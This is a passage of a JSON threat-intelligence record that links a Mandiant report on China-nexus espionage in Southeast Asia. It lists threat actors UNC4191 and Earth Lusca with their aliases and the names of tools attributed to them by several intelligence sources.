		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia"
	],
	"report_names": [
		"china-nexus-espionage-southeast-asia"
	],
	"threat_actors": [
		{
			"id": "d61cd7ed-6d16-491f-90a1-6323aae8f67f",
			"created_at": "2022-12-27T17:02:23.610663Z",
			"updated_at": "2026-04-10T02:00:04.9586Z",
			"deleted_at": null,
			"main_name": "UNC4191",
			"aliases": [],
			"source_name": "ETDA:UNC4191",
			"tools": [
				"BLUEHAZE",
				"DARKDEW",
				"HIUPAN",
				"MISTCLOAK",
				"NCAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b0f6e3c5-5424-463a-ada3-532ca52e5940",
			"created_at": "2023-11-17T02:00:07.60381Z",
			"updated_at": "2026-04-10T02:00:03.45747Z",
			"deleted_at": null,
			"main_name": "UNC4191",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC4191",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434371,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8042d71d911648f3b2811e731f99c1f3f0901db9.pdf",
		"text": "https://archive.orkl.eu/8042d71d911648f3b2811e731f99c1f3f0901db9.txt",
		"img": "https://archive.orkl.eu/8042d71d911648f3b2811e731f99c1f3f0901db9.jpg"
	}
}